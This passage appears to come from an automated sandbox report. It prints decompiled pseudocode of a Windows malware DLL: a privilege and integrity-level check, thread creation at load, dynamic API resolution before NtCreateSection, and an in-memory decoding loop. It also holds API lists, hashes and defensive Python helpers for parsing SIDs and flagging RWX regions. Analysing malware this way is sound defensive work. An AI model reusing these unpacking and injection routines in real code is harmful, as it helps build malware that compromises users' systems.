								 *0xfad130(); // executed; teardown matching the 0xfad134 call above, run only when that call returned 0 or 1
                                      							}
                                      							goto L35;
                                      						}
                                      						_t72 = _t71 + 4;
                                      						do {
                                      							_push(1);
                                      							_push(_t72);
                                      							_t67 = 5;
						} while (E00FA8134(_t67, 0) == 0x4c7); // retry while the result is 0x4c7 = ERROR_CANCELLED
                                      					}
                                      					goto L31;
                                      				} else {
                                      					_t84 = _t28;
                                      					L35:
                                      					return _t84;
                                      				}
                                      			}

                                      APIs
                                        • Part of subcall function 00FA286D: GetModuleHandleA.KERNEL32(4C44544E,00000000,00FA7098,00000000,00000000,00000000,?,?,?,?,?,00FA258B,?,00000001), ref: 00FA287C
                                      • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,00FAD238,00000000), ref: 00FA7103
                                      • CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,00FA258B,?,00000001), ref: 00FA711C
                                      • wsprintfA.USER32 ref: 00FA719C
                                      • memset.NTDLL ref: 00FA71CC
                                      • RtlInitializeCriticalSection.NTDLL(03A495F0), ref: 00FA71DD
                                      • RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 00FA7206
                                      • wsprintfA.USER32 ref: 00FA7236
                                        • Part of subcall function 00FA8B98: GetUserNameW.ADVAPI32(00000000,00FA725B), ref: 00FA8BCF
                                        • Part of subcall function 00FA8B98: RtlAllocateHeap.NTDLL(00000000,00FA725B), ref: 00FA8BE6
                                        • Part of subcall function 00FA8B98: GetUserNameW.ADVAPI32(00000000,00FA725B), ref: 00FA8BF3
                                        • Part of subcall function 00FA8B98: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00FA725B,?,?,?,?,?,00FA258B,?,00000001), ref: 00FA8C14
                                        • Part of subcall function 00FA8B98: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00FA8C3B
                                        • Part of subcall function 00FA8B98: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00FA8C4F
                                        • Part of subcall function 00FA8B98: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00FA8C5C
                                        • Part of subcall function 00FA8B98: HeapFree.KERNEL32(00000000,00000000), ref: 00FA8C7A
                                        • Part of subcall function 00FA550F: RtlAllocateHeap.NTDLL(00000000,00000000,00FA863D), ref: 00FA551B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
                                      • String ID:
                                      • API String ID: 2910951584-0
                                      • Opcode ID: f2f7d9d671c62c0387b3e4de15e5da11f2ad6c5051d85522c2a7251c1d2442f0
                                      • Instruction ID: c8431b36316512616e9a5db48bb0edf45af1a4a9ce72068f55d35d7575daa2ed
                                      • Opcode Fuzzy Hash: f2f7d9d671c62c0387b3e4de15e5da11f2ad6c5051d85522c2a7251c1d2442f0
                                      • Instruction Fuzzy Hash: A151ABF1E44219ABDB20EBA8DC45FAE73E8AB47720F144455F906E7250D778DD01BBA0
                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00FA6E28(long* _a4) {
                                      				long _v8;
                                      				void* _v12;
                                      				void _v16;
                                      				long _v20;
                                      				int _t33;
                                      				void* _t46;
                                      
				_v16 = 1; // default: report "elevated"
				_v20 = 0x2000; // default: SECURITY_MANDATORY_MEDIUM_RID
				// 0xfad214 holds 0x2000000a on this run; its low byte is used elsewhere as the Windows
				// major version, so this test separates Vista and later (where integrity levels exist) from older systems.
				if( *0xfad214 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) { // TOKEN_READ on the current process
						// Class 0x14 = TokenElevation: TOKEN_ELEVATION.TokenIsElevated lands in _v16.
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						// Class 0x19 = TokenIntegrityLevel: the first call sizes the TOKEN_MANDATORY_LABEL, the second fills it.
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00FA550F(_v8); // heap allocation (RtlAllocateHeap, see subcall below)
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									// The integrity RID is the last sub-authority of the label SID
									// (S-1-16-<rid>: 0x1000 low, 0x2000 medium, 0x3000 high, 0x4000 system).
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00FAA07B(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20; // out: integrity RID
				return _v16; // elevated flag (stays 1 on pre-Vista systems, where the query is skipped)
                                      			}

                                      APIs
                                      • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00FA6E5A
                                      • GetTokenInformation.KERNELBASE(00000000,00000014(TokenElevation),00000001,00000004,00000000,00000000), ref: 00FA6E7A
                                      • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00FA6E8A
                                      • CloseHandle.KERNEL32(00000000), ref: 00FA6EDA
                                        • Part of subcall function 00FA550F: RtlAllocateHeap.NTDLL(00000000,00000000,00FA863D), ref: 00FA551B
                                      • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 00FA6EAD
                                      • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00FA6EB5
                                      • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00FA6EC5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                      • String ID:
                                      • API String ID: 1295030180-0
                                      • Opcode ID: b6fcac268f93800f88064332215fbcb76dd9241a3b4daf4dd7f1ba95d1e56b8b
                                      • Instruction ID: f761d130f771f4c721b1ed65993dcff6989c8eaf26726a17e8d5eda2a3df4c57
                                      • Opcode Fuzzy Hash: b6fcac268f93800f88064332215fbcb76dd9241a3b4daf4dd7f1ba95d1e56b8b
                                      • Instruction Fuzzy Hash: 2B2159B9D0021DFFEB009F90DC84EEEBBB9EB0A314F0440A5F511A2161C7718E05EB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%
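The routine above queries the token twice: class 0x14 (TokenElevation) into a 4-byte TOKEN_ELEVATION, then class 0x19 (TokenIntegrityLevel), whose TOKEN_MANDATORY_LABEL SID it reduces to its last sub-authority, the integrity RID. The Python below is an added example written for this page, not code from the sample or from the sandbox: it parses the binary SID layout those calls return and derives the same two values offline, which is handy when working from a memory dump rather than a live token. The sample SIDs are constructed, and the authority check in integrity_rid is an addition the sample does not perform.

```python
import struct

# Constants from winnt.h: the mandatory-label authority and the well-known
# integrity RIDs that appear as the last sub-authority of S-1-16-<rid>.
SECURITY_MANDATORY_LABEL_AUTHORITY = 16
SECURITY_MANDATORY_UNTRUSTED_RID = 0x0000
SECURITY_MANDATORY_LOW_RID = 0x1000
SECURITY_MANDATORY_MEDIUM_RID = 0x2000
SECURITY_MANDATORY_HIGH_RID = 0x3000
SECURITY_MANDATORY_SYSTEM_RID = 0x4000


def build_sid(authority: int, *subauthorities: int) -> bytes:
    """Serialise a SID in the binary form the token APIs hand back:
    revision (1 byte) = 1, sub-authority count (1 byte), 48-bit big-endian
    identifier authority (6 bytes), then each sub-authority as a 32-bit
    little-endian value."""
    if not 1 <= len(subauthorities) <= 15:
        raise ValueError("a SID carries between 1 and 15 sub-authorities")
    blob = bytes([1, len(subauthorities)]) + authority.to_bytes(6, "big")
    for sub in subauthorities:
        blob += struct.pack("<I", sub)
    return blob


def parse_sid(blob: bytes) -> tuple[int, list[int]]:
    """Decode a binary SID, rejecting the truncations a malformed token
    buffer could present."""
    if len(blob) < 8:
        raise ValueError("SID header needs 8 bytes")
    revision, count = blob[0], blob[1]
    if revision != 1:
        raise ValueError(f"unsupported SID revision {revision}")
    if len(blob) < 8 + 4 * count:
        raise ValueError("SID truncated: sub-authority array cut short")
    authority = int.from_bytes(blob[2:8], "big")
    subauthorities = list(struct.unpack_from(f"<{count}I", blob, 8))
    return authority, subauthorities


def sid_to_string(blob: bytes) -> str:
    authority, subauthorities = parse_sid(blob)
    return "S-1-" + "-".join(str(x) for x in (authority, *subauthorities))


def integrity_rid(label_sid: bytes) -> int:
    """Offline equivalent of the decompiled
    *GetSidSubAuthority(sid, (*GetSidSubAuthorityCount(sid) - 1) & 0xff):
    the last sub-authority of the mandatory-label SID is the integrity RID.
    The authority check is added here; the sample does not perform it."""
    authority, subauthorities = parse_sid(label_sid)
    if authority != SECURITY_MANDATORY_LABEL_AUTHORITY:
        raise ValueError("not a mandatory-label SID: " + sid_to_string(label_sid))
    return subauthorities[-1]


def integrity_level_name(rid: int) -> str:
    """Integrity levels compare numerically, so bucket by threshold rather
    than exact match (Windows permits intermediate values)."""
    for floor, name in ((SECURITY_MANDATORY_SYSTEM_RID, "System"),
                        (SECURITY_MANDATORY_HIGH_RID, "High"),
                        (SECURITY_MANDATORY_MEDIUM_RID, "Medium"),
                        (SECURITY_MANDATORY_LOW_RID, "Low")):
        if rid >= floor:
            return name
    return "Untrusted"


def token_privilege_summary(elevation_buf: bytes, label_sid: bytes) -> dict:
    """Combine the two GetTokenInformation results the routine reads:
    class 0x14 (TokenElevation) is a 4-byte TokenIsElevated, class 0x19
    (TokenIntegrityLevel) carries the SID whose last RID is the level."""
    if len(elevation_buf) != 4:
        raise ValueError("TOKEN_ELEVATION is a single 32-bit TokenIsElevated")
    (is_elevated,) = struct.unpack("<I", elevation_buf)
    rid = integrity_rid(label_sid)
    return {"elevated": bool(is_elevated), "integrity_rid": rid,
            "integrity": integrity_level_name(rid)}


# Constructed sample inputs (not taken from the sandbox run): the label SIDs
# of a medium-integrity token and of an elevated high-integrity token.
MEDIUM_LABEL = build_sid(SECURITY_MANDATORY_LABEL_AUTHORITY, SECURITY_MANDATORY_MEDIUM_RID)
HIGH_LABEL = build_sid(SECURITY_MANDATORY_LABEL_AUTHORITY, SECURITY_MANDATORY_HIGH_RID)

if __name__ == "__main__":
    print(sid_to_string(MEDIUM_LABEL), token_privilege_summary(b"\x00\x00\x00\x00", MEDIUM_LABEL))
    print(sid_to_string(HIGH_LABEL), token_privilege_summary(b"\x01\x00\x00\x00", HIGH_LABEL))
```

The `& 0xff` in the decompiled expression is only there because GetSidSubAuthorityCount returns a PUCHAR; the count is a single byte, so the index can never exceed 14.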

                                      C-Code - Quality: 89%
                                      			_entry_(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
                                      				struct _SECURITY_ATTRIBUTES* _v8;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* __ebp;
                                      				long _t9;
                                      				void* _t10;
                                      				void* _t18;
                                      				void* _t23;
                                      				void* _t36;
                                      
                                      				_push(__ecx);
                                      				_t9 = _a8;
                                      				_v8 = 1;
                                      				if(_t9 == 0) {
                                      					_t10 = InterlockedDecrement(0x10004108);
                                      					__eflags = _t10;
                                      					if(_t10 == 0) {
                                      						__eflags =  *0x1000410c;
                                      						if( *0x1000410c != 0) {
                                      							_t36 = 0x2710;
                                      							while(1) {
                                      								SleepEx(0x64, 1);
                                      								__eflags =  *0x10004118;
                                      								if( *0x10004118 == 0) {
                                      									break;
                                      								}
                                      								_t36 = _t36 - 0x64;
                                      								__eflags = _t36;
                                      								if(_t36 > 0) {
                                      									continue;
                                      								}
                                      								break;
                                      							}
                                      							CloseHandle( *0x1000410c);
                                      						}
                                      						HeapDestroy( *0x10004110);
                                      					}
                                      				} else {
                                      					if(_t9 == 1 && InterlockedIncrement(0x10004108) == 1) {
                                      						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                      						_t41 = _t18;
                                      						 *0x10004110 = _t18;
                                      						if(_t18 == 0) {
                                      							L6:
                                      							_v8 = 0;
                                      						} else {
                                      							 *0x10004130 = _a4;
                                      							asm("lock xadd [eax], ebx");
                                      							_t23 = CreateThread(0, 0, E1000154A, E10001413(_a12, 0, 0x10004118, _t41), 0,  &_a8); // executed
                                      							 *0x1000410c = _t23;
                                      							if(_t23 == 0) {
                                      								asm("lock xadd [esi], eax");
                                      								goto L6;
                                      							}
                                      						}
                                      					}
                                      				}
                                      				return _v8;
                                      			}

                                      APIs
                                      • InterlockedIncrement.KERNEL32(10004108), ref: 1000148C
                                      • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 100014A1
                                      • CreateThread.KERNEL32(00000000,00000000,1000154A,00000000,00000000,?), ref: 100014D8
                                      • InterlockedDecrement.KERNEL32(10004108), ref: 100014F8
                                      • SleepEx.KERNEL32(00000064,00000001), ref: 10001512
                                      • CloseHandle.KERNEL32 ref: 1000152E
                                      • HeapDestroy.KERNEL32 ref: 1000153A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThread
                                      • String ID:
                                      • API String ID: 3416589138-0
                                      • Opcode ID: 370aab4b8a4ac52325a9400cd4fb625107d198b2f1120dfe025ddb2caed62d17
                                      • Instruction ID: 90dc2b76caf056f200fb84d904cc644a068ecf256bf027882881ad8a048a84c3
                                      • Opcode Fuzzy Hash: 370aab4b8a4ac52325a9400cd4fb625107d198b2f1120dfe025ddb2caed62d17
                                      • Instruction Fuzzy Hash: 0B21D1B1601115EBF701DF69CCC4AEA7BE8FB917D67128129F602D7168EB308E80CB64
                                      Uniqueness

                                      Uniqueness Score: -1.00%
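The dump names under Memory Dump Source record where each dumped region sat and how its pages were protected. The region at 0x10000000 that carries the Yara matches is marked 00000040, which is PAGE_EXECUTE_READWRITE, while the loaded image's code at 0xFA1000 is 00000020, PAGE_EXECUTE_READ. The Python below is an added example for this page, not a Joe Sandbox tool: it decodes the PAGE_* constants (from winnt.h) out of such names and flags regions that are both writable and executable, the usual footprint of unpacked code. The field order it assumes (process index, stage, dump id, base address, protection, type) is inferred from the names on this page and is not documented in the report; the trailing field is kept as an opaque value.

```python
import re
from dataclasses import dataclass

# Page protection constants from winnt.h.
PAGE_NOACCESS = 0x01
PAGE_READONLY = 0x02
PAGE_READWRITE = 0x04
PAGE_WRITECOPY = 0x08
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
PAGE_GUARD = 0x100
PAGE_NOCACHE = 0x200
PAGE_WRITECOMBINE = 0x400

BASE_PROTECTION_NAMES = {
    PAGE_NOACCESS: "PAGE_NOACCESS", PAGE_READONLY: "PAGE_READONLY",
    PAGE_READWRITE: "PAGE_READWRITE", PAGE_WRITECOPY: "PAGE_WRITECOPY",
    PAGE_EXECUTE: "PAGE_EXECUTE", PAGE_EXECUTE_READ: "PAGE_EXECUTE_READ",
    PAGE_EXECUTE_READWRITE: "PAGE_EXECUTE_READWRITE",
    PAGE_EXECUTE_WRITECOPY: "PAGE_EXECUTE_WRITECOPY",
}
MODIFIER_NAMES = {PAGE_GUARD: "PAGE_GUARD", PAGE_NOCACHE: "PAGE_NOCACHE",
                  PAGE_WRITECOMBINE: "PAGE_WRITECOMBINE"}
EXECUTABLE_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
WRITABLE_MASK = PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY

# Assumed field order, inferred from the names on this page (not documented):
# <proc>.<stage>.<dump id>.<base address>.<protection>.<type>.sdmp
DUMP_NAME = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<stage>[0-9a-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<prot>[0-9a-f]{8})\.(?P<kind>[0-9a-f]{8})\.sdmp$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class DumpRegion:
    name: str
    process_index: int
    stage: int
    base: int
    protection: int
    kind: int  # trailing field, left undecoded

    def protection_name(self) -> str:
        low = self.protection & 0xFF
        base = BASE_PROTECTION_NAMES.get(low, f"0x{low:02x}")
        mods = [n for bit, n in MODIFIER_NAMES.items() if self.protection & bit]
        return " | ".join([base, *mods])

    def is_executable(self) -> bool:
        return bool(self.protection & EXECUTABLE_MASK)

    def is_writable(self) -> bool:
        return bool(self.protection & WRITABLE_MASK)

    def is_rwx(self) -> bool:
        return self.is_executable() and self.is_writable()


def parse_dump_name(name: str) -> DumpRegion:
    m = DUMP_NAME.match(name)
    if not m:
        raise ValueError(f"not a recognised dump name: {name!r}")
    return DumpRegion(name=name, process_index=int(m["proc"], 16), stage=int(m["stage"], 16),
                      base=int(m["base"], 16), protection=int(m["prot"], 16), kind=int(m["kind"], 16))


def rwx_regions(names: list[str]) -> list[DumpRegion]:
    """Regions whose pages are both writable and executable, by base address."""
    return sorted((r for r in map(parse_dump_name, names) if r.is_rwx()), key=lambda r: r.base)


# Dump names exactly as they appear in this report.
REPORT_DUMPS = [
    "00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp",
    "00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp",
    "00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp",
    "00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp",
    "00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp",
    "00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp",
    "00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp",
]

if __name__ == "__main__":
    for region in map(parse_dump_name, REPORT_DUMPS):
        flag = "RWX" if region.is_rwx() else "   "
        print(f"{flag} {region.base:#010x} {region.protection_name()}")
```

Run against the names on this page, only the two regions at 0x10000000 and 0x10005000 come back as RWX; the mapped image of 2e.dll at 0xFA0000 keeps the protections a normal section layout would give it.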

                                      APIs
                                      • SysAllocString.OLEAUT32(00000000), ref: 00FA9A55
                                      • IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 00FA9AD7
                                      • StrStrIW.SHLWAPI(00000000,006E0069), ref: 00FA9B16
                                      • SysFreeString.OLEAUT32(00000000), ref: 00FA9B38
                                        • Part of subcall function 00FA736F: SysAllocString.OLEAUT32(00FAC2C8), ref: 00FA73BF
                                      • SafeArrayDestroy.OLEAUT32(?), ref: 00FA9B8C
                                      • SysFreeString.OLEAUT32(?), ref: 00FA9B9A
                                        • Part of subcall function 00FA98B3: Sleep.KERNELBASE(000001F4), ref: 00FA98FB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                      • String ID:
                                      • API String ID: 2118684380-0
                                      • Opcode ID: 3b4f8f98f620a3470dc45fb67f91de21fa9193180fb9655f6050b3c29beaee90
                                      • Instruction ID: 5d458326925f804b5d0aa844c911aa51b3ca2a2db052b267c68f5d25964310b1
                                      • Opcode Fuzzy Hash: 3b4f8f98f620a3470dc45fb67f91de21fa9193180fb9655f6050b3c29beaee90
                                      • Instruction Fuzzy Hash: 635130B6904209EFCB00DFA4D88489EB7B6FFC9350B148979E505EB220D775AE45DBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E10001314(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                      				intOrPtr _v8;
                                      				_Unknown_base(*)()* _t28;
                                      				_Unknown_base(*)()* _t32;
                                      				_Unknown_base(*)()* _t35;
                                      				_Unknown_base(*)()* _t38;
                                      				_Unknown_base(*)()* _t41;
                                      				intOrPtr _t44;
                                      				struct HINSTANCE__* _t48;
                                      				intOrPtr _t54;
                                      
                                      				_t54 = E10001BD2(0x20);
                                      				if(_t54 == 0) {
                                      					_v8 = 8;
                                      				} else {
                                      					_t48 = GetModuleHandleA( *0x10004150 + 0x10005014);
                                      					_v8 = 0x7f;
                                      					_t28 = GetProcAddress(_t48,  *0x10004150 + 0x100050dc);
                                      					 *(_t54 + 0xc) = _t28;
                                      					if(_t28 == 0) {
                                      						L8:
                                      						E100019CF(_t54);
                                      					} else {
                                      						_t32 = GetProcAddress(_t48,  *0x10004150 + 0x100050ec);
                                      						 *(_t54 + 0x10) = _t32;
                                      						if(_t32 == 0) {
                                      							goto L8;
                                      						} else {
                                      							_t35 = GetProcAddress(_t48,  *0x10004150 + 0x100050ff);
                                      							 *(_t54 + 0x14) = _t35;
                                      							if(_t35 == 0) {
                                      								goto L8;
                                      							} else {
                                      								_t38 = GetProcAddress(_t48,  *0x10004150 + 0x10005114);
                                      								 *(_t54 + 0x18) = _t38;
                                      								if(_t38 == 0) {
                                      									goto L8;
                                      								} else {
                                      									_t41 = GetProcAddress(_t48,  *0x10004150 + 0x1000512a);
                                      									 *(_t54 + 0x1c) = _t41;
                                      									if(_t41 == 0) {
                                      										goto L8;
                                      									} else {
                                      										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                      										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                      										_t44 = E10001C22(_t54, _a8); // executed
                                      										_v8 = _t44;
                                      										if(_t44 != 0) {
                                      											goto L8;
                                      										} else {
                                      											 *_a12 = _t54;
                                      										}
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      				return _v8;
                                      			}

                                      APIs
                                        • Part of subcall function 10001BD2: HeapAlloc.KERNEL32(00000000,?,10001FD0,?,00000000,00000000,?,10001069), ref: 10001BDE
                                      • GetModuleHandleA.KERNEL32(?,00000020,00000002,0000000A,?,?,?,?,1000127C,?,?,?,00000002,?,?,?), ref: 10001339
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 1000135B
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 10001371
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 10001387
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 1000139D
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 100013B3
                                        • Part of subcall function 10001C22: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,00000002), ref: 10001C7F
                                        • Part of subcall function 10001C22: memset.NTDLL ref: 10001CA1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                      • String ID:
                                      • API String ID: 1632424568-0
                                      • Opcode ID: 7f9e8b8effa9776da73fc8af15e11be96d31d9b3ffeda60abd861703891b7db8
                                      • Instruction ID: fe109954e7909d3f9f6e433a8377176990291a9dadda8b32ea6cb5e162fec745
                                      • Opcode Fuzzy Hash: 7f9e8b8effa9776da73fc8af15e11be96d31d9b3ffeda60abd861703891b7db8
                                      • Instruction Fuzzy Hash: 552108B150071ADFE750DFA9C884E9A77ECEB487C07024566E905C7659EA31EA05CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SysAllocString.OLEAUT32(80000002), ref: 00FA82E8
                                      • SysAllocString.OLEAUT32(00FA8812), ref: 00FA832B
                                      • SysFreeString.OLEAUT32(00000000), ref: 00FA833F
                                      • SysFreeString.OLEAUT32(00000000), ref: 00FA834D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: String$AllocFree
                                      • String ID:
                                      • API String ID: 344208780-0
                                      • Opcode ID: 41131134deb826db9960ebed9fb01b11032e363d542aca0b29b4dfcc556d88de
                                      • Instruction ID: 86358190e8e49c66c77a356631527105437e845770c15d5d3873629a2e94ec6a
                                      • Opcode Fuzzy Hash: 41131134deb826db9960ebed9fb01b11032e363d542aca0b29b4dfcc556d88de
                                      • Instruction Fuzzy Hash: A5310DB2900209EFCF05DF98D8848AE7BB9FF49354B10846DE506D7210DB759946DFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 87%
                                      			E100018B4(void* __edi, intOrPtr _a4) {
                                      				intOrPtr _v8;
                                      				unsigned int _v12;
                                      				intOrPtr _v16;
                                      				char _v20;
                                      				void* _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				void* _v36;
                                      				signed int _v44;
                                      				signed int _v48;
                                      				intOrPtr _t39;
                                      				void* _t46;
                                      				intOrPtr _t47;
                                      				intOrPtr _t50;
                                      				signed int _t59;
                                      				signed int _t61;
                                      				intOrPtr _t66;
                                      				intOrPtr _t77;
                                      				void* _t78;
                                      				signed int _t80;
                                      
                                      				_t77 =  *0x10004130;
                                      				_t39 = E10001568(_t77,  &_v20,  &_v12);
                                      				_v16 = _t39;
                                      				if(_t39 == 0) {
                                      					asm("sbb ebx, ebx");
                                      					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
                                      					_t78 = _t77 + _v20;
                                      					_v36 = _t78;
                                      					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
                                      					_v24 = _t46;
                                      					if(_t46 == 0) {
                                      						_v16 = 8;
                                      					} else {
                                      						_t61 = 0;
                                      						if(_t59 <= 0) {
                                      							_t47 =  *0x1000414c;
                                      						} else {
                                      							_t66 = _a4;
                                      							_t50 = _t46 - _t78;
                                      							_t11 = _t66 + 0x10005132; // 0x10005132
                                      							_v28 = _t50;
                                      							_v32 = _t50 + _t11;
                                      							_v8 = _t78;
                                      							while(1) {
                                      								asm("movsd");
                                      								asm("movsd");
                                      								asm("movsd");
                                      								_t19 = _t61 + 1; // 0x2
                                      								_t80 = _t19;
                                      								E100015C2(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
                                      								_t64 = _v32;
                                      								_v8 = _v8 + 0x1000;
                                      								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
                                      								_t61 = _t80;
                                      								 *0x1000414c = _t47;
                                      								if(_t61 >= _t59) {
                                      									break;
                                      								}
                                      								_t50 = _v28;
                                      							}
                                      						}
                                      						if(_t47 != 0x63699bc3) {
                                      							_v16 = 0xc;
                                      						} else {
                                      							memcpy(_v36, _v24, _v12);
                                      						}
                                      						VirtualFree(_v24, 0, 0x8000); // executed
                                      					}
                                      				}
                                      				return _v16;
                                      			}

                                      APIs
                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00000000,?,00000000,?,?,?,?,?,?,10001045,00000000), ref: 1000190A
                                      • memcpy.NTDLL(?,10001045,?,?,00000000,?,00000000,?,?,?,?,?,?,10001045,00000000), ref: 1000199C
                                      • VirtualFree.KERNELBASE(10001045,00000000,00008000,?,00000000,?,00000000,?,?,?,?,?,?,10001045,00000000), ref: 100019B7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFreememcpy
                                      • String ID: Dec 21 2020
                                      • API String ID: 4010158826-582694290
                                      • Opcode ID: fe59e3ce876bfb539fa861a9b9cfecae9c0e82148f33d4892438cc5565000b28
                                      • Instruction ID: b04c2c9f5289fe9f3ce3b798613b62a7b986b909cf86b02473ad1d3b0995d0da
                                      • Opcode Fuzzy Hash: fe59e3ce876bfb539fa861a9b9cfecae9c0e82148f33d4892438cc5565000b28
